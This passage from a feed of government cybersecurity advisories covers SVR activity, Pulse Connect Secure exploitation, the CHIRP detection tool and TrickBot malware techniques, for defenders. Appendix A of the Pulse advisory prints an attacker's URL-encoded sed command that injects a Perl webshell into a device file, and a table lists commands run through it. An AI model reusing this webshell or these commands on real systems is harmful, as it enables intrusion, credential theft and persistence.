number of SVR cyber personas use e-mail services hosted on cock[.]li or related domains. The FBI also notes SVR cyber operators have used open source or commercially available tools continuously, including Mimikatz—an open source credential-dumping too—and Cobalt Strike—a commercially available exploitation tool. MitigationsThe FBI and DHS recommend service providers strengthen their user validation and verification systems to prohibit misuse of their services. Resources NSA, CISA, FBI Joint Cybersecurity Advisory: Russian SVR Targets U.S. and Allied Networks CISA: Remediating Networks Affected by the SolarWinds and Active Directory/M365 Compromise  CISA Alert AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments FBI, CISA, ODNI, NSA Joint Statement: Joint Statement by the Federal Bureau of Investigation, the Cybersecurity and Infrastructure Security Agency, the Office of the Director of National Intelligence (ODNI), and the National Security Agency CISA Alert AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations CISA Insights: What Every Leader Needs to Know about the Ongoing APT Cyber Activity FBI, CISA Joint Cybersecurity Advisory: Advanced Persistent Threat Actors Targeting U.S. Think Tanks CISA: Malicious Activity Targeting COVID-19 Research, Vaccine Development  NCSC, CSE, NSA, CISA Advisory: APT 29 targets COVID-19 vaccine development Revisions April 26, 2021: Initial Version This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-110A: Exploitation of Pulse Connect Secure Vulnerabilities
    by CISA on 20 Aprile 2021 at 3:03 pm

    Original release date: April 20, 2021 | Last revised: July 21, 2021SummaryThe Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting a number of U.S. government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor—or actors—beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA and Ivanti have assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the Pulse Secure Connect Integrity Tool. To gain initial access, the threat actor is leveraging multiple vulnerabilities, including CVE-2019-11510, CVE-2020-8260, CVE-2020-8243, and the newly disclosed CVE-2021-22893. The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching. (Updated May 3, 2021): Ivanti  has released  Security Advisory SA44784 addressing CVE-2021-22893 and three additional newly disclosed CVEs—CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the Pulse Secure Connect Integrity Tool, update to the latest software version, and investigate for malicious activity. (Updated May 27. 2021): CISA has updated this alert to include new threat actor techniques, tactics, and procedures (TTPs), indicators of compromise (IOCs), and updated mitigations. See Ivanti KB44755 - Pulse Connect Secure (PCS) Integrity Assurance for updated guidance to ensure the full integrity of your Pulse Connect Secure software. (Updated July 21, 2021): Please see our new Malware Analysis Reports in regards to adversary activity analyzed by CISA that were discovered on Pulse Secure Connect Devices. For a downloadable list of indicators of compromise (IOCs), see AA21-110A.stix. Technical DetailsOn March 31, 2021, Ivanti released the Pulse Secure Connect Integrity Tool to detect the integrity of Pulse Connect Secure appliances. Their technical bulletin states: We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE- 2020- 8260). For more information visit KB44764 (Customer FAQ). (Updated May 27, 2021): CISA has observed the cyber threat actor performing cleanup as demonstrated by the following: Threat actor was observed timestomping trojanized umount binary to match timestamps of legitimate binaries attempting to disguise the modifications; the touch command was used to modify the time stamp https://attack.mitre.org/techniques/T1070/006/:           /bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp     2. The threat actor deleted files from temp directories using "rm -f":            /bin/rm -f tmp1           /bin/rm -f tmp2     3. Timestamps: Note: for context, loop 6 is the active partition and loop 8 is the rollback partition of the device. Date  Time (GMT) Partition Artifact Activity  4/13/21 5:15:33 pulse-loop6 /bin/umount Content Modification Time 4/20/21 19:09:14 pulse-loop8 /bin/umount Metadata Modification Time 4/20/21 19:09:14 pulse-loop8 /bin/umount Content Modification Time 4/20/21 19:18:49 pulse-loop6 /bin/umount Metadata Modification Time 4/23/21 16:14:48 pulse-loop6 /bin/umount Last Access Time 5/6/21 14:27:20 pulse-loop8 /bin/umount Last Access Time 4/20/21 19:08:01 pulse-loop6 /bin/touch Last Access Time 4/20/21 19:09:14 pulse-loop8 /bin/touch Last Access Time Security firm FireEye has posted more information on their blog, including activity related to actor clean up. See the FireEye blog post, Re-Checking Your Pulse, for more information, including activity related to actor cleanup. The suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. The modifications implemented a variety of webshell functionality: DSUpgrade.pm MD5: 4d5b410e1756072a701dfd3722951907 Runs arbitrary commands passed to it Copies malicious code into Licenseserverproto.cgi Licenseserverproto.cgi MD5: 9b526db005ee8075912ca6572d69a5d6 Copies malicious logic to the new files during the patching process, allowing for persistence Secid_canceltoken.cgi MD5: f2beca612db26d771fe6ed7a87f48a5a Runs arbitrary commands passed via HTTP requests compcheckresult.cgi MD5: ca0175d86049fa7c796ea06b413857a3 Publicly-facing page to send arbitrary commands with ID argument Login.cgi MD5: 56e2a1566c7989612320f4ef1669e7d5 Allows for credential harvesting of authenticated users Healthcheck.cgi MD5: 8c291ad2d50f3845788bc11b2f603b4a Runs arbitrary commands passed via HTTP requests Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log as seen in the following format, URIs have been redacted to minimize access to webshells that may still be active: Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX. The threat actor then ran the commands listed in table 1 via the webshell. Table 1: Commands run via webshell Time Command 2021-01-19T07:46:05.000+0000 pwd 2021-01-19T07:46:24.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted] 2021-01-19T08:10:13.000+0000 cat%20/home/webserver/htdocs/dana-na/l[redacted] 2021-01-19T08:14:18.000+0000 See Appendix. 2021-01-19T08:15:11.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted] 2021-01-19T08:15:49.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted] 2021-01-19T09:03:05.000+0000 cat%20/home/webserver/htdocs/dana-na/[redacted] 2021-01-19T09:04:47.000+0000 $mount 2021-01-19T09:05:13.000+0000 /bin/mount%20-o%20remount,rw%20/dev/root%20/ 2021-01-19T09:07:10.000+0000 $mount The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity. Note: these devices are not related to the Pulse vulnerabilities, but rather, where the malicious internet traffic passes through. Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available. (Updated April 30, 2021): Detections (Updated April 30, 2021): Impossible Travel During the course of analysis, it is possible that a network defender may be able to reveal illegitimate connections from users that are masquerading as legitimate users from different geolocations. CISA has noted IPs associated with malicious webshell interaction from a threat actor—associated with a single username—in both the authenticated and the unauthenticated logs at the same time. The geo-location for the two IP addresses was sufficiently far that impossible travel calculations could detect the threat actor IP address. (Updated April 30, 2021): TLS Fingerprinting Transport Layer Security (TLS) fingerprinting may also be useful in identifying malicious activity. CISA has noted re-use of various JA3 hashes including JA3 hashes that align with Chrome, Firefox, and others. Caution should be taken when using TLS fingerprinting because the majority of the JA3 hashes observed in connection with Pulse Connect Secure exploitation were not unique to malicious activity. The same JA3 hashes—and the software they characterize—are often used for benign activity, vulnerability scanning, etc. Overlap in JA3 hashes cannot be considered a high-fidelity indicator of malicious activity, let alone successful exploitation. Connections made via JA3 must be corroborated with other data points. A common observation is that the TLS connections frequently exclude the Server Name Indication (SNI) extension, which is relatively rare in most environments where users connect to Domain Name Server (DNS) host names (but is commonly observed in scanning). It is believed this is an artifact of attackers browsing direct to IP addresses instead of host names. The JA3 hashes in table 2 below have been observed in connection with a pulse secure exploitation. Note: there may be many User-Agents associated with a given JA3 (often due to User-Agent spoofing) and the prevalence of a given JA3 necessarily differs by environment. The prevalence column of table 2 refers to how often the specific JA3 hash was observed in the dataset that was being analyzed. Some hashes are rarely observed in the dataset and the information is provided for context only. Analytical conclusions should not be made solely based on this reporting. The prevalence of a JA3 hash observed in an environment would need to be further evaluated.   Table 2: JA3 MD5 hashes and associated prevalence/user-agent JA3 Hash User-Agent Prevalence 227ab2ae6ed6abcc249e8a873a033144 Firefox (~68-71) very rare 30017f6f809155387cbcf95be6e7225d (UA header frequently not set) rare 3cbc88eabdac9af71445f9040a6cf46c Chrome (~50-57) very rare 53829d58e2631a372bb4de1be2cbecca Chrome (~51-81) rare 714cdf6e462870e2b85d251a3b22064b Firefox (~65-68) very rare 86cb13d6bbb3ac96b78b408bcfc18794 Python-requests, many others common (but rare when used with pulse secure) 8f6747b71d1003df1b7e3e8232b1a7e3 Chrome (~89) rare 916e458922ae9a1bab6b1154689c7de7 Firefox (~60-86) very rare a29d0d294a6236b5bf0ec2573dd4f02f Firefox (~77-87), Chrome (~78-90), others very rare af26ba5e85475b634275141e6ed3dc54 Python-requests, many others rare b592adaa596bb72a5c1ccdbecae52e3f Chrome (~79-90) rare c12f54a3f91dc7bafd92cb59fe009a35 Office, many others very rare Mitigations(Updated May 3, 2021) CISA strongly urges organizations using Pulse Secure devices to immediately: Review the Pulse Secure Connect Integrity Tool Quick Start Guide and Customer FAQs Run the Pulse Secure Connect Integrity Tool. The tool requires a reboot. If virtualized, take a snapshot before running. If the appliance is physical, consider the consequences of rebooting and running the tool and contact Ivanti for assistance or questions. (Updated May 3, 2021) Continue to run the tool daily until the XML mitigations have been implemented or the patch has been deployed. Note: the Pulse Secure team released Security Advisory SA44784 that addresses CVE-2021-22893, CVE-2021-22984, CVE-2021-22899, and CVE-2021-22900 with patches. Implement the mitigations released by the vendor. According Ivanti Pulse Secure, the interim XML configurations listed in the "Workaround" section of SA44784 - 2021-04: Out-of-Cycle Advisory: Pulse Connect Secure RCE Vulnerability (CVE-2021-22893) provide significant protection against threat actor activity. (Updated May 3, 2021) Update to the latest software version., per the process outlined on Ivanti Pulse Secure’s website which contains security enhancements. (Updated May 27, 2021) Using the Pulse Secure Integrity Checker. The Integrity Checker Tool (ICT) helps system owners understand if their Pulse Secure Connect device has been compromised. While the tool is accurate, there are several nuances to its effective use. The ICT detects evidence of adversary cleanup only on the current, running version of PCS. It may be necessary to roll back the current PCS version to have a valid run of the ICT. During the upgrade process, the active version becomes a rollback partition. Only one rollback partition exists on a device, as the rollback partition is replaced on each update. Therefore, if an entity has updated their PCS device without running the correct version of the ICT (as outlined in Appendix B), anomalous activity will not be detected.   If the Integrity Checker Tools finds mismatched or unauthorized files, CISA urges organizations to: Contact CISA to report your findings (see Contact Information section below). Contact Ivanti Pulse Secure for assistance in capturing forensic information. Review “Unauthenticated Web Requests” log for evidence of exploitation, if enabled. Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts and any accounts that could be modified by any account described above, all of these accounts should be assumed to be compromised). Note: Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device, and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched. Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance's VPN lease pool. (Updated May 27, 2021) Note: adversary activity may not be easily identifiable on your network as it may appear as a normal user traffic. If a device has been compromised, entities should take all precautions as if the adversary has intruded past the device into your network and take steps to ensure there are no further signs of an intrusion into networks that include: Look for unauthorized applications and scheduled tasks in environments.  Ensure no new administrators were created. Ensure non-privileged users were not added to privileged groups. Scrutinize and monitor all accounts with domain administrator privileges.  Monitor domain administrator accounts to ensure they are only accessing the part of the network they are authorized to access.  Check all accounts should be checked to ensure they have the proper level of privileges and have not been altered such as increased privileges.  Remove any remote access programs not approved by the organization. Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment. In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files, should consider the guidance in KB44764 - Customer FAQ: PCS Security Integrity Tool Enhancements, which includes: After preservation, you can remediate your Pulse Connect Secure appliance by:  Disabling the external-facing interface.   Saving the system and user config. Performing a factory reset via the Serial Console. Note: For more information refer to KB22964 (How to reset a PCS device to the factory default setting via the serial console) Updating the appliance to the newest version. Re-importing the saved config.    Re-enabling the external interface.  CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the Pulse Secure Connect Integrity Tool again after remediation has been taken place. CISA would like to thank Ivanti for their contributions to this Alert. Contact InformationCISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at 1-888-282-0870 (From outside the United States: +1-703-235-8832) central@cisa.dhs.gov (UNCLASS) us-cert@dhs.sgov.gov (SIPRNET) us-cert@dhs.ic.gov (JWICS) CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at http://www.us-cert.cisa.gov/. Appendix A: Large sed Command Found In Unauthenticated Logs Unauthenticated request url /dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20\$n=\$_[0];my%20\$rs;for%20(my%20\$i=0;\$i%3C\$n;\$i++){my%20\$n1=int(rand(256));\$rs.=chr(\$n1);}return%20\$rs;}sub%20a{my%20\$st=\$_[0];my%20\$k=r([redacted]);my%20\$en%20=%20RC4(%20\$k.\$ph,%20\$st);return%20encode_base64(\$k.\$en);}sub%20b{my%20\$s=%20decode_base64(\$_[0]);%20my%20\$l=length(\$s);my%20\$k=%20substr(\$s,0,[redacted]);my%20\$en=substr(\$s,[redacted],\$l-[redacted]);my%20\$de%20=%20RC4(%20\$k.\$ph,%20\$en%20);return%20\$de;}sub%20c{my%20\$fi=CGI::param(%27img%27);my%20\$FN=b(\$fi);my%20\$fd;print%20\%22Content-type:%20application/x-download\\n\%22;open(*FILE,%20\%22%3C\$FN\%22%20);while(%3CFILE%3E){\$fd=\$fd.\$_;}close(*FILE);print%20\%22Content-Disposition:%20attachment;%20filename=tmp\\n\\n\%22;print%20a(\$fd);}sub%20d{print%20\%22Cache-Control:%20no-cache\\n\%22;print%20\%22Content-type:%20text/html\\n\\n\%22;my%20\$fi%20=%20CGI::param(%27cert%27);\$fi=b(\$fi);my%20\$pa=CGI::param(%27md5%27);\$pa=b(\$pa);open%20(*outfile,%20\%22%3E\$pa\%22);print%20outfile%20\$fi;close%20(*outfile);}sub%20e{print%20\%22Cache-Control:%20no-cache\\n\%22;print%20\%22Content-type:%20image/gif\\n\\n\%22;my%20\$na=CGI::param(%27name%27);\$na=b(\$na);my%20\$rt;if%20(!\$na%20or%20\$na%20eq%20\%22cd\%22)%20{\$rt=\%22Error%20404\%22;}else%20{my%20\$ot=\%22/tmp/1\%22;system(\%22\$na%20%3E/tmp/1%202%3E&1\%22);open(*cmd_result,\%22%3C\$ot\%22);while(%3Ccmd_result%3E){\$rt=\$rt.\$_;}close(*cmd_result);unlink%20\$ot}%20%20print%20a(\$rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20\%22\%22){e();}else{%20%20%20&main();}}if%20(\$ENV{%27REQUEST_METHOD%27}%20eq%20\%22POST\%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs/dana-na/[redacted] came from IP XX.XX.XX.XX Appendix B: ICT Releases Table 3: ICT Releases – releases are cumulative Release Package  Supported Versions (n+1 always supports nth versions) Release Date package-integrity-checker-11951.1.pkg 8.3R7.1 (build 65025) 9.1R7 (build 6567) 9.1R8 (build 7453) 9.1R8.1 (build 7851) 9.1R8.2 (build 8511) 9.1R9 (build 9189) 9.1R9.1 (build 9701) 9.1R10 (build 10119) 9.1R11 (build 11161) 9.1R11.1 (build 11915) 3/31/2021 (ICTv1 released to public on 3/31/2021) *Initial build package-integrity-checker-12255.1.pkg 9.1R8.4 (build 12177) 9.1R9.2 (build 12181) 9.1R10.2 (build 12179) 9.1R11.3 (build 12173) 9.1R1(build 1505) 9.1R2 (build 2331)  9.1R3 (build 3535) 9.1R4 (build 4763) 9.1R4.1 (build 4967) 9.1R4.2 (build 5035) 9.1R4.3 (build 5185) 9.1R5 (build 5459) 9.1R6 (build 5801) 4/17/2021 (ICTv2 released to public on 4/18/2021) package-integrity-checker-12363.1.pkg 9.1R11.3:HF1(build 12235) 9.1R9.1HF1 (build 10625.1) 9.1R11.1HF1(build 12049.1) 9.1R11.4 (build 12319) 5/3/2021 (ICTv3 released to public on 5/3/2021)   References FireEye blog: Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day CERT/CC Vulnerability Note VU#213092 Pulse Connect Secure vulnerable to authentication bypass Revisions April 20, 2021: Initial version April 21, 2021: Added CERT/CC Vulnerability Note to References April 26, 2021: Added IOC STIX File April 30, 2021: Replaced IOC STIX File; Added new Detection Section May 3, 2021: Added Ivanti Security Update Information May 27, 2021: Added additional technical details and Appendix B July 21, 2021: Added update note directing reader to review new Malware Analysis Reports This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-077A: Detecting Post-Compromise Threat Activity Using the CHIRP IOC Detection Tool
    by CISA on 18 Marzo 2021 at 6:00 pm

    Original release date: March 18, 2021 | Last revised: April 15, 2021SummaryUpdated April 15, 2021: The U.S. Government attributes this activity to the Russian Foreign Intelligence Service (SVR). Additional information may be found in a statement from the White House. For more information on SolarWinds-related activity, go to https://us-cert.cisa.gov/remediating-apt-compromised-networks and https://www.cisa.gov/supply-chain-compromise. This Alert announces the CISA Hunt and Incident Response Program (CHIRP) tool. CHIRP is a forensics collection tool that CISA developed to help network defenders find indicators of compromise (IOCs) associated with activity detailed in the following CISA Alerts: AA20-352A: Advanced Persistent Threat Compromise of Government Agencies, Critical Infrastructure, and Private Sector Organizations, which primarily focuses on an advanced persistent threat (APT) actor’s compromise of SolarWinds Orion products affecting U.S. government agencies, critical infrastructure entities, and private network organizations. AA21-008A: Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments, which addresses APT activity within Microsoft 365/Azure environments and offers an overview of—and guidance on—available open-source tools. The Alert includes the CISA-developed Sparrow tool that helps network defenders detect possible compromised accounts and applications in the Azure/M365 environment. Similar to Sparrow—which scans for signs of APT compromise within an M365 or Azure environment—CHIRP scans for signs of APT compromise within an on-premises environment. In this release, CHIRP, by default, searches for IOCs associated with malicious activity detailed in AA20-352A and AA21-008A that has spilled into an on-premises enterprise environment. CHIRP is freely available on the CISA GitHub Repository. For additional guidance watch CISA's CHIRP Overview video. Note: CISA will continue to release plugins and IOC packages for new threats via the CISA GitHub Repository. CISA advises organizations to use CHIRP to: Examine Windows event logs for artifacts associated with this activity; Examine Windows Registry for evidence of intrusion; Query Windows network artifacts; and Apply YARA rules to detect malware, backdoors, or implants. Network defenders should review and confirm any post-compromise threat activity detected by the tool. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s). If an organization does not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network. Click here for a PDF version of this report. Technical DetailsHow CHIRP Works CHIRP is a command-line executable with a dynamic plugin and indicator system to search for signs of compromise. CHIRP has plugins to search through event logs and registry keys and run YARA rules to scan for signs of APT tactics, techniques, and procedures. CHIRP also has a YAML file that contains a list of IOCs that CISA associates with the malware and APT activity detailed in CISA Alerts AA20-352A and AA21-008A. Currently, the tool looks for: The presence of malware identified by security researchers as TEARDROP and RAINDROP; Credential dumping certificate pulls; Certain persistence mechanisms identified as associated with this campaign; System, network, and M365 enumeration; and Known observable indicators of lateral movement. Network defenders can follow step-by-step instructions on the CISA CHIRP GitHub repository to add additional IOCs, YARA rules, or plugins to CHIRP to search for post-compromise threat activity related to the SolarWinds Orion supply chain compromise or new threat activity. Compatibility CHIRP currently only scans Windows operating systems. Instructions CHIRP is available on CISA’s GitHub repository in two forms: A compiled executable A python script CISA recommends using the compiled version to easily scan a system for APT activity. For instructions to run, read the README.md in the CHIRP GitHub repository. If you choose to use the native Python version, see the detailed instructions on the CHIRP GitHub repository. MitigationsInterpreting the Results CHIRP provides results of its scan in JSON format. CISA encourages uploading the results into a security information and event management (SIEM) system, if available. If no SIEM system is available, results can be viewed in a compatible web browser or text editor. If CHIRP detects any post-compromise threat activity, those detections should be reviewed and confirmed. CISA has provided confidence scores for each IOC and YARA rule included with CHIRP’s release. For confirmed positive hits, CISA recommends collecting a forensic image of the relevant system(s) and conducting a forensic analysis on the system(s). If you do not have the capability to follow the guidance in this Alert, consider soliciting third-party IT security support. Note: Responding to confirmed positive hits is essential to evict an adversary from a compromised network. Frequently Asked Questions What systems should CHIRP run on? Systems running SolarWinds Orion or believed to be involved in any resulting lateral movement. What should I do with results? Ingest the JSON results into a SIEM system, web browser, or text editor. Are there existing tools that CHIRP complements and/or provide the same benefit as CHIRP? Antivirus software developers may have begun to roll out detections for the SolarWinds post-compromise activity. However, those products can miss historical signs of compromise. CHIRP can provide a complementary benefit to antivirus when run. CISA previously released the Sparrow tool that scans for APT activity within M365 and Azure environments related to activity detailed in CISA Alerts AA20-352A and AA21-008A. CHIRP provides a complementary capability to Sparrow by scanning for on-premises systems for similar activity. How often should I run CHIRP? CHIRP can be run once or routinely. Currently, CHIRP does not provide a mechanism to run repeatedly in its native format. Do I need to configure the tool before I run it? No. Will CHIRP change or affect anything on the system(s) it runs on? No, CHIRP only scans the system(s) it runs on and makes no active changes. How long will it take to run CHIRP? CHIRP will complete its scan in approximately 1 to 2 hours. Duration will be dependent on the level of activity, the system, and the size of the resident data sets. CHIRP will provide periodic progress updates as it runs. If I have questions, who do I contact?   For general questions regarding CHIRP, please contact CISA via email at central@cisa.dhs.gov or by phone at 1-888-282-0870. For reporting indicators of potential compromise, contact us by submitting a report through our website at https://us-cert.cisa.gov/report. For all technical issues or support for CHIRP, please submit issues at the CISA CHIRP GitHub Repository.  Revisions March 18, 2021: Initial Publication April 9, 2021: Fixed PDF (not related to content) April 15, 2021: Updated with Attribution Statement This product is provided subject to this Notification and this Privacy & Use policy.

  • AA21-076A: TrickBot Malware
    by CISA on 17 Marzo 2021 at 3:00 pm

    Original release date: March 17, 2021 | Last revised: May 20, 2021SummaryThis Joint Cybersecurity Advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK®) framework, Version 8. See the ATT&CK for Enterprise for all referenced threat actor tactics and techniques. The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) have observed continued targeting through spearphishing campaigns using TrickBot malware in North America. A sophisticated group of cybercrime actors is luring victims, via phishing emails, with a traffic infringement phishing scheme to download TrickBot. TrickBot—first identified in 2016—is a Trojan developed and operated by a sophisticated group of cybercrime actors. Originally designed as a banking Trojan to steal financial data, TrickBot has evolved into highly modular, multi-stage malware that provides its operators a full suite of tools to conduct a myriad of illegal cyber activities. To secure against TrickBot, CISA and FBI recommend implementing the mitigation measures described in this Joint Cybersecurity Advisory, which include blocking suspicious Internet Protocol addresses, using antivirus software, and providing social engineering and phishing training to employees. Click here for a PDF version of this report. Technical DetailsTrickBot is an advanced Trojan that malicious actors spread primarily by spearphishing campaigns using tailored emails that contain malicious attachments or links, which—if enabled—execute malware (Phishing: Spearphishing Attachment [T1566.001], Phishing: Spearphishing Link [T1566.002]). CISA and FBI are aware of recent attacks that use phishing emails, claiming to contain proof of a traffic violation, to steal sensitive information. The phishing emails contain links that redirect to a website hosted on a compromised server that prompts the victim to click on photo proof of their traffic violation. (User Execution: Malicious Link [T1204.001], User Execution: Malicious File [T1204.002]). In clicking the photo, the victim unknowingly downloads a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s command and control (C2) server to download TrickBot to the victim’s system (Command and Scripting Interpreter: JavaScript [T1059.007]). Attackers can use TrickBot to: Drop other malware, such as Ryuk and Conti ransomware, or Serve as an Emotet downloader (Ingress Tool Transfer [T1105]).[1] TrickBot uses person-in-the-browser attacks to steal information, such as login credentials (Man in the Browser [T1185]). Additionally, some of TrickBot’s modules spread the malware laterally across a network by abusing the Server Message Block (SMB) Protocol. TrickBot operators have a toolset capable of spanning the entirety of the MITRE ATT&CK framework, from actively or passively gathering information that can be used to support targeting (Reconnaissance [TA0043]), to trying to manipulate, interrupt, or destroy systems and data (Impact [TA0040]). TrickBot is capable of data exfiltration over a hardcoded C2 server, cryptomining, and host enumeration (e.g., reconnaissance of Unified Extensible Firmware Interface or Basic Input/Output System [UEFI/BIOS] firmware) (Exfiltration Over C2 Channel [T1041], Resource Hijacking [T1496], System Information Discovery.[2] For host enumeration, operators deliver TrickBot in modules containing a configuration file with specific tasks. Figure 1 lays out TrickBot’s use of enterprise techniques. Figure 1: MITRE ATT&CK enterprise techniques used by TrickBot   MITRE ATT&CK Techniques According to MITRE, TrickBot [S0266] uses the ATT&CK techniques listed in table 1. Table 1: TrickBot ATT&CK techniques for enterprise Initial Access [TA0001] Technique Title ID Use Phishing: Spearphishing Attachment T1566.001 TrickBot has used an email with an Excel sheet containing a malicious macro to deploy the malware. Phishing: Spearphishing Link T1566.002 TrickBot has been delivered via malicious links in phishing emails. Execution [TA0002] Technique Title ID Use Scheduled Task/Job: Scheduled Task T1053.005 TrickBot creates a scheduled task on the system that provides persistence. Command and Scripting Interpreter: Windows Command Shell T1059.003 TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine. Command and Scripting Interpreter: JavaScript/JScript T1059.007 TrickBot victims unknowingly download a malicious JavaScript file that, when opened, automatically communicates with the malicious actor’s C2 server to download TrickBot to the victim’s system. Native API T1106 TrickBot uses the Windows Application Programming Interface (API) call, CreateProcessW(), to manage execution flow. User Execution: Malicious Link T1204.001 TrickBot has sent spearphishing emails in an attempt to lure users to click on a malicious link. User Execution: Malicious File T1204.002 TrickBot has attempted to get users to launch malicious documents to deliver its payload. Persistence [TA0003] Technique Title ID Use Scheduled Task/Job: Scheduled Task T1053.005 TrickBot creates a scheduled task on the system that provides persistence. Create or Modify System Process: Windows Service T1543.003 TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots. Privilege Escalation [TA0004] Technique Title ID Use Scheduled Task/Job: Scheduled Task T1053.005 TrickBot creates a scheduled task on the system that provides persistence. Process Injection: Process Hollowing T1055.012 TrickBot injects into the svchost.exe process. Create or Modify System Process: Windows Service T1543.003 TrickBot establishes persistence by creating an autostart service that allows it to run whenever the machine boots.  Defense Evasion [TA0005] Technique Title ID Use Obfuscated Files or Information T1027 TrickBot uses non-descriptive names to hide functionality and uses an AES CBC (256 bits) encryption algorithm for its loader and configuration files. Obfuscated Files or Information: Software Packing T1027.002 TrickBot leverages a custom packer to obfuscate its functionality. Masquerading T1036 The TrickBot downloader has used an icon to appear as a Microsoft Word document. Process Injection: Process Hollowing T1055.012 TrickBot injects into the svchost.exe process. Modify Registry T1112 TrickBot can modify registry entries. Deobfuscate/Decode Files or Information T1140 TrickBot decodes the configuration data and modules. Subvert Trust Controls: Code Signing T1553.002 TrickBot has come with a signed downloader component. Impair Defenses: Disable or Modify Tools T1562.001 TrickBot can disable Windows Defender. Credential Access [TA0006] Technique Title ID Use Input Capture: Credential API Hooking T1056.004 TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. Unsecured Credentials: Credentials in Files T1552.001 TrickBot can obtain passwords stored in files from several applications such as Outlook, Filezilla, OpenSSH, OpenVPN and WinSCP. Additionally, it searches for the .vnc.lnk affix to steal VNC credentials. Unsecured Credentials: Credentials in Registry T1552.002 TrickBot has retrieved PuTTY credentials by querying the Software\SimonTatham\Putty\Sessions registry key. Credentials from Password Stores T1555 TrickBot can steal passwords from the KeePass open-source password manager. Credentials from Password Stores: Credentials from Web Browsers T1555.003 TrickBot can obtain passwords stored in files from web browsers such as Chrome, Firefox, Internet Explorer, and Microsoft Edge, sometimes using esentutl. Discovery [TA0007] Technique Tactic ID Use System Service Discovery T1007 TrickBot collects a list of install programs and services on the system’s machine. System Network Configuration Discovery T1016 TrickBot obtains the IP address, location, and other relevant network information from the victim’s machine. Remote System Discovery T1018 TrickBot can enumerate computers and network devices. System Owner/User Discovery T1033 TrickBot can identify the user and groups the user belongs to on a compromised host. Permission Groups Discovery T1069 TrickBot can identify the groups the user on a compromised host belongs to. System Information Discovery T1082 TrickBot gathers the OS version, machine name, CPU type, amount of RAM available from the victim’s machine. File and Directory Discovery T1083 TrickBot searches the system for all of the following file extensions: .avi, .mov, .mkv, .mpeg, .mpeg4, .mp4, .mp3, .wav, .ogg, .jpeg, .jpg, .png, .bmp, .gif, .tiff, .ico, .xlsx, and .zip. It can also obtain browsing history, cookies, and plug-in information. Account Discovery: Local Account T1087.001 TrickBot collects the users of the system. Account Discovery: Email Account T1087.003 TrickBot collects email addresses from Outlook. Domain Trust Discovery T1482 TrickBot can gather information about domain trusts by utilizing Nltest. Lateral Movement [TA0008] Technique Tactic ID Use Lateral Tool Transfer T1570 Some TrickBot modules spread the malware laterally across a network by abusing the SMB Protocol. Collection [TA0009] Technique Tactic ID Use Data from Local System T1005 TrickBot collects local files and information from the victim’s local machine. Input Capture:Credential API Hooking T1056.004 TrickBot has the ability to capture Remote Desktop Protocol credentials by capturing the CredEnumerateA API. Person in the Browser T1185 